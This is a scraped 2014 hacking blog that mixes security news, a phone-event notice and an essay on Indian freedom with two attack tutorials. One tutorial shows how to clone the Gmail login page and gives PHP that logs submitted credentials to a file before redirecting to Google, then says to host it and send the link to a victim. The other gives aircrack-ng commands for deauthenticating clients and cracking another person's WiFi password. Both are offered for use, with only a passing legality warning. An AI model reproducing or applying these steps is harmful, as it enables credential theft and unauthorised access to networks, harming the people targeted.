Popular Posts

Saturday, 1 November 2014

Phishing Tutorial : The Way to Fish Passwords!

Phishing basically is the attempt to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.

For such attacks, popular social web sites, auction sites, banks sites, online payment/transfer sites or IT administrators are commonly used to lure unsuspecting public. Phishing emails or instant messages may contain links to websites that are infected with malware, so then the victim enters his details at a fake website whose look and feel are almost identical to the legitimate one.

Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies.

Phishing can be done for fun to attack Facebook, Gmail, Yahoo, Twitter, etc. Such attacks on Social Networking Sites are used to steal password and Hack Accounts. But beware, don't exceed your limits as this is illegal.

For Example, we took Gmail for the Tutorial.

Basic Pre requisites :
* Basic knowledge about HTML (Hyper Text Markup Language)
* Basic of How Web Applications Work
* Basic knowledge in PHP (Not Recommended)
* Little about Hosting Files on WWW (World Wide Web)

Steps : 

- Open mail.google.com login page, Hit Ctrl + S [ Then Save it on Desktop]
You'll get one folder with images + javascript and one.html file
click to enlarge
- Do not touch anything in folder, now open the '.html file' with Notepad or any text editor, and lets mess with some codes.

- If you know little bit of HTML & CSS then this will be a real easy task for you.

   'All websites use HTML form to get ID and Password, we just have to modify the code with some changes and connect little PHP file to the HTML form so our application can record Username and password and save it into one log file'

- Now, Search for "action" statement  in the code. (you've to change action value with your PHP file)
Click to enlarge
- Now Just pause this tutorial here and back to desktop, now Open notepad and just write 5 lines PHP code like this :

<?phpheader ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');$handle = fopen("log.txt", "a");foreach($_POST as $variable =>$value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>

Now, Just save that entire code to desktop with downloaded files, as .PHP extension file, for eg.: Error.php (so your victim won't realize and he might think that it is some kind of error and didn't logged in, & he'll then be redirected the real page) Also create one Blank notepad .txt file and place it at same downloaded file with the name of 'log.txt'.
click to enlarge
So, its very easy and simple... now again back to the edited code of .html file and change action value to "Error.php" name of your PHP logger. Save it, and Finally you're done. you created Gmail Phishing page, now we'll host this on a Free WebHosting services like 000webhost.com and after all this work you've to give the created web link to the victim and wait until he enters his email and password.
Enjoy...!!

This post was created by one of our elite members NightMare!

Also visit back to view our next post about how to be safe from such Phishing Attacks.

Tuesday, 16 September 2014

Amazon account cookies can get stolen just by downloading a Kindle ebook!

A security researcher has reported what appears to be an embarrassing flaw on Amazon’s website that could put Kindle users at high risk.

Benjamin Daniel Mussler claims that the “Manage Your Content and Devices” and “Manage Your Kindle” services on Amazon’s web-based Kindle Library are vulnerable to a cross-site scripting (XSS) attack, which can be exploited by a boobytrapped eBook title.

When this boobytrapped eBook is added to the intended victim’s library, the code will be automatically executed when the Kindle Library webpage is opened.
According to Mussler this means that “Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised”.

Well its unlikely to find an eBook with a maliciously-crafted title in the official Kindle eBook store, provided Amazon keeps its eyes open. Instead, the only real chance that you might fall victim to the vulnerability is if you pirate eBooks, downloading them from online web sources and use Amazon’s “Send to Kindle” service to have them accessible on your reader.

Mussler says he first reported the vulnerability to Amazon in November 2003, along with an example eBook that ran proof-of-concept eBook that grabbed cookies and sent them to him. Amazon’s technical team managed to fix the flaw within four days, nice!
But....
To Mussler’s shock, the very same vulnerability was introduced approximately two months ago, and currently remains unfixed. The researcher informed Amazon that the security hole has re-emerged, but received no response from the company.

For that reason, Mussler has decided to go public with his findings. Amazon needs to fix the security hole, even if it is only likely to be a risk for a small number of Kindle users, and fix it permanently.

In the meantime, Kindle users are advised to get their eBooks from official stores, just to be on the safe & secure!

Source

Sunday, 7 September 2014

Fake Links to Nude Celebrities Crashes New Zealand's Internet

Users in New Zealand keen to view hacked photos of naked celebrities are being blamed for a nationwide lnternet meltdown involving the country's main provider.
New Zealanders be like....
It is believed that a handful of computer users clicked links on Friday evening believing they would take them to the illicit images, but instead they inadvertently installed malware triggering a crippling Internet attack.

It took telecommunications giant Spark until Sunday to fully repair what it termed a "dynamic" cybereattack that overloaded its system covering more than 600,000 customers. Spark tweeted it was aware that when people clicked on some links they inadvertently installed malware.
People just pissed off as even Google can't find for them lol
Computer security specialists Trend Micro issued an alert shortly before the attack began, warning not to open the links related to the nude celebrities. "For obvious reasons, clicking on links to 'naked celebrity' photos, or opening email attachments would be a very bad idea right now, expect criminals to ride this bandwagon immediately," it said.

Trend Micro said users who clicked the link offering to show a video of the actress were directed to download a "video converter" that was actually a malicious software.
New Zealand authorities said they did not know who was behind the attack, which was launched from outside the country, and the malware was generating denial-of-service attacks towards Europe.

People just can't stop themselves from searching for those nudes as they have "hope on the Internet", but it gets even tougher as Reddit Shuts down the subreddit 'The Fappening' which was the major source for the pics
"hope on the Interest"

Friday, 5 September 2014

Wifi Hacking Tutorial with Backtrack

Hacking is an art, a skill and today we'll be talking about how to hack a wifi password!

Things you require :
- Backtrack 5 OS
- A Computer with Wifi & DVD drive
- codes
- & Your Brain!

To start off, download the Backtrack OS here via torrent BT5R3 32bit , BT5R3 64bit and burn it in a blank cd via this software Imgburn. (any doubts about how to do that, Google it or ask)

Then insert that cd in your PC & reboot it, it may start directly via the DVD or if it doesn't, then while your pc starts Press the Function key to go into the boot menu option (F8 for my intel motherboard, it's different for others) the select the DVD drive as boot device, then enter.
click to zoom
The above screen will appear, Wait for 30 secs and it'll start via the live DVD, at the end type "startx" then press enter when your reach the stage as given in the pic below.
click to zoom
Next step is to open the console, which is found on the top toolbar.

Step 1 : type "airmon-ng" & press enter.
(this will detect your wifi card)

Step 2 : type "airmon-ng start wlan0"
(this starts the monitor mode)

Step 3 : type "airodump-ng --encrypt wpa mon0"
(this scans the wifi networks available)


press ctrl+C to stop the scan,
Now select the wifi network you need to hack, I'll be hacking nerdsmasher! here.

Step 4 : type "airodump-ng -w nerdsmasher! --encrypt wpa -c 1 --bssid AA:BE:19:63:B9:20 mon0"
(this will target only the required network)

In this stage, you compulsory need a host connected to the network, unless it won't work and you'll have to try that again later, evenings works good.

When you get a host connected, keep the window as it is & open a new terminal and type there..
Step 5 : "aireplay-ng -0 0 -a AA:BE:19:63:B9:20 -c CC:C3:EA:75:CB:78 mon0"

Now wait till you get a handshake on the first window as shown below.

The hacking part is done, so close both the windows, and let's crack the password now.

Open up a new terminal.

Type "aircrack-ng -w (drag the wordlist here) (drag the crack file here)" then press enter

root folder , .cap file

Now wait for the password.
....
And boom!

Note :
Backtrack has 2 wordlists already inbuilt in
File manager > pentest > passwords > wordlists,
you can use those, or download a huge wordlist from the internet, you'll find that easily.
You can also create a wordlist with local mobile numbers as mostly people keep their mobile numbers as their wifi passwords, I have created such wordlists with mobile numbers of Maharashtra & Mumbai circle, as you might see in the above pics.
Use the internet tools to create such mobile directories.

Have fun!

If you have any doubts please feel free to message us on our Facebook Page Here , and make sure that you like it too!


Tuesday, 2 September 2014

OnePlus and FoneArena to Host a OnePlus Fan Meetup in India

As OnePlus One is coming soon to India, the OnePlus team is already here, maybe to finalize the job place of General Manager which they listed a week back on their website.

So here's the news OnePlus team & Fonearena has decided to host a OnePlus Fan Meetup in Bangalore, India on 4th of September. Many people wants the One, in my view it's the only Smartphone with great specs & low price.

A few members of the OnePlus Team will be present at the event along with some of the members from the FoneArena team. Attendees can interact with all of team and also get a chance to play with the device, to feel the One! Also, this event gives you an opportunity to get all your queries answered, like the guarantee issues or the Service Centers availability.

To make this event even more interesting, the OnePlus team will be giving away some of the coolest and exclusive OnePlus branded merchandise like T-shits,bags and pens. Even a OnePlus One unit to one of the lucky fans at the venue. For this register yourself for our grand event in the link below or at the source link at the end.

CLICK HERE TO RSVP – for the OnePlus India Fan Meetup in Bangalore on on September 4th, Thursday between 4PM to 7PM.

Note: Space is limited so its first fill first serve basis.

Source : FoneArena

Monday, 1 September 2014

The truth about our freedom

The truth about our freedom


India gained independence in 1947, when the clock struck 00:00, on August 15th,thus releasing us from the harsh, evil and India's worst times ever.
Today's generation was never a part of this freedom struggle, and we do not know of the hardships, the problems, the misery, the risks, that our forefathers went through nor can we ever relate to the kind of patriotism they had for India.

A salute to all the freedom-fighters and people who sacrificed for our country, and to all those who shed blood for our motherland, knowing that they will never see the light of a free India.

A span of 68 years has gone by after that glorious victory. 

Now let me come to the core point of my blog and ask all you readers, a pressing question and I want all of you to answer it, analyse it, not be credulous and try to ponder over it.


Have we really achieved freedom?


Now, before you make any impulsive decision and judge me to be a vile person, let me answer it for you.

No. We never achieved freedom. It is true, that we are free from the chains of the British, but as a human being, are we really free? Are we really independent?
No again. Many of you are likely to disagree with me, but this is the part where I need you to do the opposite and simply read on!

Let's take an example of the recent incidents that has shed light on the numerous rape cases that has occurred in our country and has been occurring in our country, which has left many women scared to even leave their homes in the evening and lead a normal life like others, let alone the statements made by various politicians that blame the women as the driving cause for such horrendous incidents. 

For each and every decision they take, they have to think more than twice. So, if you think we have achieved independence then, people, yo have painted the wrong picture.
This is curbing freedom. We are still not free from the people of our own country. 
Think about this and let's join hands and take the first step towards freeing ourselves!

If you still think otherwise, and feel that this is not a cogent explanation follow this blog for more on such social issues.

Have a good day. 






“I am no bird; and no net ensnares me: I am a free human being with an independent will.” 
― Charlotte Brontë, Jane Eyre








Saturday, 30 August 2014

An Offline attack shows Wi-Fi routers still vulnerable to hackers

An attack can break into some common Wi-Fi routers, via a configuration feature.

A researcher has refined an attack on wireless routers with poorly implemented versions of the Wi-Fi Protected Setup (WPS) that allows someone to quickly gain access to a router's network & enjoy "Free" Internet.

This attack exploits weak randomization of the router in a key used to authenticate hardware PINs on some implementations of WPS, allowing anyone to quickly collect enough information to guess the PIN using offline calculations. By calculating the correct PIN, rather than attempting to brute-force guess the numerical password.

The previous attacks require up to 11,000 guesse and approximately four hours to find the correct PIN to access the router's WPS functionality, also the Reaver tool from Backtrack is dead as the router locks itself in an online attack. But the new attack only requires a single guess and a series of offline calculations, according to Dominique Bongard, reverse engineer and founder of 0xcite, a Swiss security firm as he says "It takes one second," "It's nothing. Bang. Done."
An attack using Backtrack 5 (click to zoom)
The problem affects the implementations provided by two chipset manufacturers, Broadcom and a second vendor whom Bongard asked not to be named until they have had a chance to remediate the problem.

Because many router manufacturers use the reference software implementation as the basis for their customized router software, the problems affected the final products, Bongard said. Broadcom's reference implementation had poor randomization, while the second vendor used a special seed, or nonce, of zero, essentially eliminating any randomness.

The attack was originally demonstrated at the Black Hat security conference in early August, on the previous work published by Stefan Viehböck in late 2011. Viehböck found a number of design flaws in Wi-Fi Protected Setup, but most significantly, he found that the PIN needed to complete the setup of a wireless router could be broken into smaller parts and each part attacked separately. By breaking down the key, the number of attempts an attacker would have to try before finding the key shrunk from an untenable 100 million down to a paltry 11,000—a significant flaw for any access-control technology.

We'll be posting a post next week instructing how to hack a wifi network using Backtrack 5, so stay back!

Source : Arstechnica

Friday, 29 August 2014

Snowden claims NSA (accidentally) took Syria off the internet!

Back in late 2012, situation around Damascus was very sensitive, and suddenly all internet services in and out of Syria was suddenly shut down.

All the blame went to the Assad government, claiming that the regime had deliberately cut off communications to prevent the outside world from seeing what was happening in the country.

Technology firm Cloudflare published a detailed blog post, entitled “How Syria turned off the internet”, in an attempt to explain the outage and debunk claims by Syrian authorities that it was the result of a technical failure:

“While we cannot know for sure, our network team estimates that Syria likely has a small number of edge routers. All the edge routers are controlled by Syrian Telecommunications. The systematic way in which routes were withdrawn suggests that this was done through updates in router configurations, not through a physical failure or cable cut.”

But now the Mystery unfolds, In an interview with Wired, whistleblower Edward Snowden presented a different opinion: that the Syrian internet shutdown was the result of an NSA hack that went wrong:
The Internet Blackout
"One day an intelligence officer told him that TAO — a division of NSA hackers — had attempted in 2012 to remotely install an exploit in one of the core routers at a major Internet service provider in Syria, which was in the midst of a prolonged civil war. This would have given the NSA access to email and other Internet traffic from much of the country. But something went wrong, and the router was bricked instead — rendered totally inoperable. The failure of this router caused Syria to suddenly lose all connection to the Internet—although the public didn’t know that the US government was responsible. (This is the first time the claim has been revealed.)

Inside the TAO operations center, the panicked government hackers had what Snowden calls an “oh shit” moment. They raced to remotely repair the router, desperate to cover their tracks and prevent the Syrians from discovering the sophisticated infiltration software used to access the network. But because the router was bricked, they were powerless to fix the problem.

Fortunately for the NSA, the Syrians were apparently more focused on restoring the nation’s Internet than on tracking down the cause of the outage. Back at TAO’s operations center, the tension was broken with a joke that contained more than a little truth: “If we get caught, we can always point the finger at Israel.

Hence it appears that Cloudflare was correct right back in 2012 when they stated the issue was due to a problematical router update. Just that it was done by the NSA hackers, rather than the Syrians.
It's really doubtful that NSA was so capable to knock off an entire country off the internet grid! While Ars Technica had stated that Syrian telecoms chiefs might have decided to withdraw Syrian networks from internet routing tables as a precautionary measure, while it investigated what had happened to its router.

It’s hard to say if Snowden is telling the truth, also the NSA won't willingly admit to any hacking it was doing against another country, and the Syrian authorities have got more other matters to solve about than investigate an internet problem that happened two years ago.

And if it's true, then seriously NSA must stop such activities, atleast don't make such mistakes, we know how tough it is to live without internet! "The Living Dead"


Source